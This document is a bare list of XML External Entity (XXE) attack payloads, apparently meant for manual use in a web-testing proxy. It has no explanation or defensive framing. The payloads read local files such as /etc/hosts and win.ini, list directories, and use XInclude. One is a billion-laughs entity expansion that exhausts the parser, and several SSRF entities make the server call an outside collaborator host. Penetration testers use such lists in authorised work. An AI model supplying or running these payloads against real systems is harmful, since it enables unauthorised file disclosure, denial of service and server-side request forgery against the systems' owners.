# THIS IS MANUAL PAYLOAD LIST 
## IT WILL NOT WORK WITH INTRUDER
### FOR LINUX TARGET USE:
/etc/hosts
### FOR WINDOWS TARGET USE:
C:/Windows/win.ini

### ---  --- --- --- ---  ###
### --- FILE RETRIVAL --- ###
### ---  --- --- --- ---  ###

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY file SYSTEM "/etc/hosts"> ]>
<data>&file;</data>

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY % file SYSTEM "/etc/hosts"> ]>
<data>&file;</data>

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY file SYSTEM "file:///etc/hosts"> ]>
<data>&file;</data>

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo_target (#ANY)>
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<foo_target>&file;</foo_target>

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts"> ]>
<data>&file;</data>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
<!ELEMENT foo_target ANY >
<!ENTITY file SYSTEM "file:///etc/hosts" >]>
<foo_target>&file;</foo_target>

### ---  --- --- --- --- --- --- ###
### --- DIRECTORY LISTENING ---  ###
### ---  --- --- --- --- --- --- ###

## Here you retrieve /root/ :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE aa[<!ELEMENT bb ANY>
<!ENTITY xxe SYSTEM "file:///">]>
<data>&xxe;</data>

## Here you retrieve /etc/ :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]>
<data>&xxe;</data>


### ---  --- --- --- ###
### --- XInclude --- ###
### ---  --- --- --- ###
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/hosts"/></foo>


### ---  --- --- ###
### --- DOS ---  ###
### ---  --- --- ###
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<data>&a10;</data>


### ---  --- --- ###
### --- SSRF --- ###
### ---  --- --- ###
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "https://domain_collab" >
]>
<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "https://domain_collab" >
]>
<foo>&xxe;</foo>


### ---  --- ---  ###
### --- BASIC --- ###
### ---  --- ---  ###
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY basicXXE "CrimsonXXE"> ]>
 <creds>
  <username>&basicXXE;</username>
 </creds>
